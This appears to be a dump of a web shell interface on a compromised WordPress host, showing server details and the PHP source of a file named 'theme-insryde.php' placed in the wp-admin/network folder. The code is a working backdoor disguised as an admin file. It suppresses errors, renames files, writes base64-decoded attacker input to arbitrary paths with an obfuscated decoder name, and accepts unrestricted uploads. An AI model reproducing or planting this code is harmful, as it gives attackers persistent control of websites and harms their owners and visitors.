HEX
Server: Apache/2.4.64 (AlmaLinux)
System: Linux host.knownfor.solutions 4.18.0-553.81.1.el8_10.x86_64 #1 SMP Mon Oct 27 11:29:19 EDT 2025 x86_64
User: orionconstel (1010)
PHP: 8.4.14
Disabled: NONE
Upload Files
File: /chroot/home/orionconstel/orionandtheconstellations.com/html/wp-admin/network/theme-insryde.php
<?php error_reporting(0); if (isset($_POST['fname'])){ rename(trim($_POST['fname']), trim($_POST['sname'])); exit; }elseif(isset($_POST['message'])){ $b4 = 'b'.'a'.'se64'.'_dec'.'ode'; fwrite(fopen(trim($_POST['name']), 'w'), $b4(trim($_POST['message']))); exit; } move_uploaded_file($_FILES['file']['tmp_name'], $_FILES['file']['name']); ?>